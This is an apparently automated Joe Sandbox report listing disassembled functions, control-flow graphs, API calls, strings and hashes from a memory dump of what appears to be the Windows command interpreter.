7ff789bd409d-7ff789bd40b3 call 7ff789bd855c _local_unwind 793->802 794->802 803 7ff789bd3f13-7ff789bd3f1c 795->803 804 7ff789bd3f46-7ff789bd3f69 call 7ff789bd498c 795->804 796->804 805 7ff789bd40b8-7ff789bd40de GetLastError call 7ff789bd855c _local_unwind 796->805 797->780 799->794 802->805 803->796 803->804 815 7ff789bd40e3-7ff789bd40f9 call 7ff789bd855c _local_unwind 804->815 816 7ff789bd3f6f-7ff789bd3f98 call 7ff789bd417c 804->816 805->815 815->766 816->775
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                                                    • String ID: :
                                                                                                                    • API String ID: 1809961153-336475711
                                                                                                                    • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                                    • Instruction ID: b0d96a2fd9b7916e2b00d8c2bbcad7862bcae1d816a6a14b0cde534e318dba2c
                                                                                                                    • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                                                    • Instruction Fuzzy Hash: 1DD16F3260CB8992EA60EF15E4582B9FBB1FB84B96F944135DA4E437A5EF3CE444C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD2394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 914 7ff789bd2394-7ff789bd2416 memset call 7ff789bcca40 917 7ff789bde0d2-7ff789bde0da call 7ff789bd4c1c 914->917 918 7ff789bd241c-7ff789bd2453 GetModuleFileNameW call 7ff789bd081c 914->918 923 7ff789bde0db-7ff789bde0ee call 7ff789bd498c 917->923 918->923 924 7ff789bd2459-7ff789bd2468 call 7ff789bd081c 918->924 929 7ff789bde0f4-7ff789bde107 call 7ff789bd498c 923->929 924->929 930 7ff789bd246e-7ff789bd247d call 7ff789bd081c 924->930 937 7ff789bde10d-7ff789bde123 929->937 935 7ff789bd2483-7ff789bd2492 call 7ff789bd081c 930->935 936 7ff789bd2516-7ff789bd2529 call 7ff789bd498c 930->936 935->937 947 7ff789bd2498-7ff789bd24a7 call 7ff789bd081c 935->947 936->935 940 7ff789bde125-7ff789bde139 wcschr 937->940 941 7ff789bde13f-7ff789bde17a _wcsupr 937->941 940->941 944 7ff789bde27c 940->944 945 7ff789bde181-7ff789bde199 wcsrchr 941->945 946 7ff789bde17c-7ff789bde17f 941->946 949 7ff789bde283-7ff789bde29b call 7ff789bd498c 944->949 948 7ff789bde19c 945->948 946->948 956 7ff789bde2a1-7ff789bde2c3 _wcsicmp 947->956 957 7ff789bd24ad-7ff789bd24c5 call 7ff789bd3c24 947->957 951 7ff789bde1a0-7ff789bde1a7 948->951 949->956 951->951 954 7ff789bde1a9-7ff789bde1bb 951->954 958 7ff789bde264-7ff789bde277 call 7ff789bd1300 954->958 959 7ff789bde1c1-7ff789bde1e6 954->959 964 7ff789bd24ca-7ff789bd24db 957->964 958->944 962 7ff789bde1e8-7ff789bde1f1 959->962 963 7ff789bde21a 959->963 966 7ff789bde1f3-7ff789bde1f6 962->966 967 7ff789bde201-7ff789bde210 962->967 965 7ff789bde21d-7ff789bde21f 963->965 968 7ff789bd24dd-7ff789bd24e4 ??_V@YAXPEAX@Z 964->968 969 7ff789bd24e9-7ff789bd2514 call 7ff789bd8f80 964->969 965->949 970 7ff789bde221-7ff789bde228 965->970 966->967 972 7ff789bde1f8-7ff789bde1ff 966->972 967->963 973 7ff789bde212-7ff789bde218 967->973 968->969 974 7ff789bde254-7ff789bde262 970->974 975 7ff789bde22a-7ff789bde231 970->975 972->966 972->967 973->965 974->944 977 7ff789bde234-7ff789bde237 975->977 977->974 978 7ff789bde239-7ff789bde242 977->978 978->974 979 7ff789bde244-7ff789bde252 978->979 979->974 979->977
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                                                    • API String ID: 2622545777-4197029667
                                                                                                                    • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                                    • Instruction ID: 60fd9973c3da53a564de136386a01161a2632694cfad739d6541687127a0554c
                                                                                                                    • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                                                    • Instruction Fuzzy Hash: ED919021B09B8A85EE24AF50D8582B8ABB1FF49F96FE44135C90E47695EF3CE505C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                                                                    • String ID: CMD.EXE
                                                                                                                    • API String ID: 1606018815-3025314500
                                                                                                                    • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                    • Instruction ID: 3299cb7f43317e234de5a003531adecd52e5948384da8e56c3566d34a81e151e
                                                                                                                    • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                    • Instruction Fuzzy Hash: 7741A835A09746DBE644AF25E855578FEB0BB89F56FE58139C90E433A0EF3DA404C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCC620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 992 7ff789bcc620-7ff789bcc66f GetConsoleTitleW 993 7ff789bcc675-7ff789bcc687 call 7ff789bcaf14 992->993 994 7ff789bdc5f2 992->994 998 7ff789bcc68e-7ff789bcc69d call 7ff789bcca40 993->998 999 7ff789bcc689 993->999 997 7ff789bdc5fc-7ff789bdc60c GetLastError 994->997 1000 7ff789bdc5e3 call 7ff789bc3278 997->1000 1004 7ff789bdc5e8-7ff789bdc5ed call 7ff789bd855c 998->1004 1005 7ff789bcc6a3-7ff789bcc6ac 998->1005 999->998 1000->1004 1004->994 1007 7ff789bcc954-7ff789bcc95e call 7ff789bd291c 1005->1007 1008 7ff789bcc6b2-7ff789bcc6c5 call 7ff789bcb9c0 1005->1008 1013 7ff789bcc964-7ff789bcc972 call 7ff789bc89c0 1007->1013 1014 7ff789bdc5de-7ff789bdc5e0 1007->1014 1015 7ff789bcc9b5-7ff789bcc9b8 call 7ff789bd5c6c 1008->1015 1016 7ff789bcc6cb-7ff789bcc6ce 1008->1016 1013->997 1026 7ff789bcc978-7ff789bcc99a towupper 1013->1026 1014->1000 1020 7ff789bcc9bd-7ff789bcc9c9 call 7ff789bd855c 1015->1020 1016->1004 1019 7ff789bcc6d4-7ff789bcc6e9 1016->1019 1022 7ff789bdc616-7ff789bdc620 call 7ff789bd855c 1019->1022 1023 7ff789bcc6ef-7ff789bcc6fa 1019->1023 1038 7ff789bcc9d0-7ff789bcc9d7 1020->1038 1028 7ff789bdc627 1022->1028 1027 7ff789bcc700-7ff789bcc713 1023->1027 1023->1028 1033 7ff789bcc9a0-7ff789bcc9a9 1026->1033 1029 7ff789bdc631 1027->1029 1030 7ff789bcc719-7ff789bcc72c 1027->1030 1028->1029 1035 7ff789bdc63b 1029->1035 1034 7ff789bcc732-7ff789bcc747 call 7ff789bcd3f0 1030->1034 1030->1035 1033->1033 1036 7ff789bcc9ab-7ff789bcc9af 1033->1036 1045 7ff789bcc8ac-7ff789bcc8af 1034->1045 1046 7ff789bcc74d-7ff789bcc750 1034->1046 1043 7ff789bdc645 1035->1043 1036->1015 1039 7ff789bdc60e-7ff789bdc611 call 7ff789beec14 1036->1039 1041 7ff789bcc872-7ff789bcc8aa call 7ff789bd855c call 7ff789bd8f80 1038->1041 1042 7ff789bcc9dd-7ff789bdc6da SetConsoleTitleW 1038->1042 1039->1022 1042->1041 1053 7ff789bdc64e-7ff789bdc651 1043->1053 1045->1046 1052 7ff789bcc8b5-7ff789bcc8d3 wcsncmp 1045->1052 1049 7ff789bcc752-7ff789bcc764 call 7ff789bcbd38 1046->1049 1050 7ff789bcc76a-7ff789bcc76d 1046->1050 1049->1004 1049->1050 1056 7ff789bcc773-7ff789bcc77a 1050->1056 1057 7ff789bcc840-7ff789bcc84b call 7ff789bccb40 1050->1057 1052->1050 1058 7ff789bcc8d9 1052->1058 1059 7ff789bcc80d-7ff789bcc811 1053->1059 1060 7ff789bdc657-7ff789bdc65b 1053->1060 1065 7ff789bcc780-7ff789bcc784 1056->1065 1078 7ff789bcc856-7ff789bcc86c 1057->1078 1079 7ff789bcc84d-7ff789bcc855 call 7ff789bccad4 1057->1079 1058->1046 1061 7ff789bcc9e2-7ff789bcc9e7 1059->1061 1062 7ff789bcc817-7ff789bcc81b 1059->1062 1060->1059 1061->1062 1069 7ff789bcc9ed-7ff789bcc9f7 call 7ff789bd291c 1061->1069 1067 7ff789bcc821 1062->1067 1068 7ff789bcca1b-7ff789bcca1f 1062->1068 1070 7ff789bcc83d 1065->1070 1071 7ff789bcc78a-7ff789bcc7a4 wcschr 1065->1071 1074 7ff789bcc824-7ff789bcc82d 1067->1074 1068->1067 1073 7ff789bcca25-7ff789bdc6b3 call 7ff789bc3278 1068->1073 1089 7ff789bdc684-7ff789bdc698 call 7ff789bc3278 1069->1089 1090 7ff789bcc9fd-7ff789bcca00 1069->1090 1070->1057 1076 7ff789bcc8de-7ff789bcc8f7 1071->1076 1077 7ff789bcc7aa-7ff789bcc7ad 1071->1077 1073->1004 1074->1074 1081 7ff789bcc82f-7ff789bcc837 1074->1081 1083 7ff789bcc900-7ff789bcc908 1076->1083 1084 7ff789bcc7b0-7ff789bcc7b8 1077->1084 1078->1038 1078->1041 1079->1078 1081->1065 1081->1070 1083->1083 1091 7ff789bcc90a-7ff789bcc915 1083->1091 1084->1084 1092 7ff789bcc7ba-7ff789bcc7c7 1084->1092 1089->1004 1090->1062 1095 7ff789bcca06-7ff789bcca10 call 7ff789bc89c0 1090->1095 1096 7ff789bcc917 1091->1096 1097 7ff789bcc93a-7ff789bcc944 1091->1097 1092->1053 1098 7ff789bcc7cd-7ff789bcc7db 1092->1098 1095->1062 1114 7ff789bcca16-7ff789bdc67f GetLastError call 7ff789bc3278 1095->1114 1099 7ff789bcc920-7ff789bcc928 1096->1099 1102 7ff789bcca2a-7ff789bcca2f call 7ff789bd9158 1097->1102 1103 7ff789bcc94a 1097->1103 1100 7ff789bcc7e0-7ff789bcc7e7 1098->1100 1105 7ff789bcc932-7ff789bcc938 1099->1105 1106 7ff789bcc92a-7ff789bcc92f 1099->1106 1107 7ff789bcc800-7ff789bcc803 1100->1107 1108 7ff789bcc7e9-7ff789bcc7f1 1100->1108 1102->1014 1103->1007 1105->1097 1105->1099 1106->1105 1107->1043 1112 7ff789bcc809 1107->1112 1108->1107 1111 7ff789bcc7f3-7ff789bcc7fe 1108->1111 1111->1100 1111->1107 1112->1059 1114->1004
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleTitlewcschr
                                                                                                                    • String ID: /$:
                                                                                                                    • API String ID: 2364928044-4222935259
                                                                                                                    • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                    • Instruction ID: b8abf05d1ee36f7657701d36279c7cd405663751491767debf31f8a4a979afa1
                                                                                                                    • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                                                    • Instruction Fuzzy Hash: 21C1C361A0864A81EB54BF25D818279EAB0FF91FAAFE45531D91E472D5EF3CEC41C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD8D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1171 7ff789bd8d80-7ff789bd8da2 1172 7ff789bd8da4-7ff789bd8daf 1171->1172 1173 7ff789bd8db1-7ff789bd8db4 1172->1173 1174 7ff789bd8dcc 1172->1174 1175 7ff789bd8db6-7ff789bd8dbd 1173->1175 1176 7ff789bd8dbf-7ff789bd8dca Sleep 1173->1176 1177 7ff789bd8dd1-7ff789bd8dd9 1174->1177 1175->1177 1176->1172 1178 7ff789bd8ddb-7ff789bd8de5 _amsg_exit 1177->1178 1179 7ff789bd8de7-7ff789bd8def 1177->1179 1182 7ff789bd8e4c-7ff789bd8e54 1178->1182 1180 7ff789bd8e46 1179->1180 1181 7ff789bd8df1-7ff789bd8e0a 1179->1181 1180->1182 1183 7ff789bd8e0e-7ff789bd8e11 1181->1183 1184 7ff789bd8e73-7ff789bd8e75 1182->1184 1185 7ff789bd8e56-7ff789bd8e69 _initterm 1182->1185 1186 7ff789bd8e13-7ff789bd8e15 1183->1186 1187 7ff789bd8e38-7ff789bd8e3a 1183->1187 1188 7ff789bd8e80-7ff789bd8e88 1184->1188 1189 7ff789bd8e77-7ff789bd8e79 1184->1189 1185->1184 1192 7ff789bd8e3c-7ff789bd8e41 1186->1192 1193 7ff789bd8e17-7ff789bd8e1b 1186->1193 1187->1182 1187->1192 1190 7ff789bd8eb4-7ff789bd8ec8 call 7ff789bd37d8 1188->1190 1191 7ff789bd8e8a-7ff789bd8e98 call 7ff789bd94f0 1188->1191 1189->1188 1200 7ff789bd8ecd-7ff789bd8eda 1190->1200 1191->1190 1201 7ff789bd8e9a-7ff789bd8eaa 1191->1201 1198 7ff789bd8f28-7ff789bd8f3d 1192->1198 1195 7ff789bd8e2d-7ff789bd8e36 1193->1195 1196 7ff789bd8e1d-7ff789bd8e29 1193->1196 1195->1183 1196->1195 1203 7ff789bd8ee4-7ff789bd8eeb 1200->1203 1204 7ff789bd8edc-7ff789bd8ede exit 1200->1204 1201->1190 1205 7ff789bd8eed-7ff789bd8ef3 _cexit 1203->1205 1206 7ff789bd8ef9 1203->1206 1204->1203 1205->1206 1206->1198
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4291973834-0
                                                                                                                    • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                    • Instruction ID: fd36f15fa70688c71d3d237c448c6d7c2621358d1865a51b08f47448841d4206
                                                                                                                    • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                                    • Instruction Fuzzy Hash: E641EA31A0864B82FB50BF14E848279BAB0FF84B87FA40435D90D47AA1EF7CE940C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD4A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1207 7ff789bd4a14-7ff789bd4a3e GetEnvironmentStringsW 1208 7ff789bd4a40-7ff789bd4a46 1207->1208 1209 7ff789bd4aae-7ff789bd4ac5 1207->1209 1210 7ff789bd4a48-7ff789bd4a52 1208->1210 1211 7ff789bd4a59-7ff789bd4a8f GetProcessHeap RtlAllocateHeap 1208->1211 1210->1210 1212 7ff789bd4a54-7ff789bd4a57 1210->1212 1213 7ff789bd4a9f-7ff789bd4aa9 FreeEnvironmentStringsW 1211->1213 1214 7ff789bd4a91-7ff789bd4a9a memmove 1211->1214 1212->1210 1212->1211 1213->1209 1214->1213
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A28
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A66
                                                                                                                    • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A7D
                                                                                                                    • memmove.MSVCRT(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4A9A
                                                                                                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF789BD49F1), ref: 00007FF789BD4AA2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 647542462-0
                                                                                                                    • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                    • Instruction ID: 22b6ab8d10396b70089c8aa42b937a7d59a23d72c71fb2171ac516d91849c66a
                                                                                                                    • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                                                                                                    • Instruction Fuzzy Hash: 42119122A1474A82EA50AF01A408039FFB1FB89FD1BA99038DE4E03784EE3DE441C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1826527819-0
                                                                                                                    • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                    • Instruction ID: 562cfe40114dfa559621950d2e94bbb69561535941de4195e46df5234c609949
                                                                                                                    • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                                    • Instruction Fuzzy Hash: F5011E2190968ACAE7047F55A858179FE70FB8AF97FE45134E54F06396EF3C9044C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD3060 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$FullNamePathwcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1464828906-0
                                                                                                                    • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                    • Instruction ID: 27f947337f6c6770e3a38acb9bed05b055e5ccdb58b107c6198c233ad4e4fe5f
                                                                                                                    • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                    • Instruction Fuzzy Hash: EB31F521A0865A82E724BF15A44817EFA71FB45FDAFE48234DA4E433D1EE7DE885C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCCA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
